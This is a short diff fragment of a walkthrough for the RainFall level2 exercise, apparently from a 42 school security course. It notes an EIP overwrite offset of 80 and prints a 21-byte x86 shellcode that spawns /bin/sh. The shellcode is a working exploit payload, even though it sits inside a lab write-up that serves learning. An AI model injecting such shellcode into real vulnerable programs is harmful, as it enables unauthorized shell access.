adrih1/Ecole42/PostCommonCore/RainFall/level2/walkthrough.md

 ```

 We found that the offset of eip starts at 80.
-Our shellcode will be :
+Our shellcode will be a classic bin/sh :
 ```plaintext
 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80
 ```